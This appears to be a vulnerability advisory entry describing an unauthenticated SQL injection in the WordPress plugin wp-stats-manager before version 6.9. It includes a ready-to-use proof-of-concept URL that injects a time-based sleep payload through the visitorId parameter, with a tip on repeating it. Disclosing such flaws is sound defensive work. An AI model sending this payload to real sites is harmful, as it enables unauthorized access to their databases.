The plugin does not escape user input which is concatenated to an SQL query, allowing unauthenticated visitors to conduct SQL Injection attacks.
Note: The visitorId parameter’s numerical prefix (before the %27) must be different on each try. https://example.com/?wmcAction=wmcTrack&siteId;=34&url;=test&uid;=01&pid;=02&visitorId;=132123’,sleep(10),0,0,0,0,0);–±
CPE | Name | Operator | Version |
---|---|---|---|
wp-stats-manager | lt | 6.9 |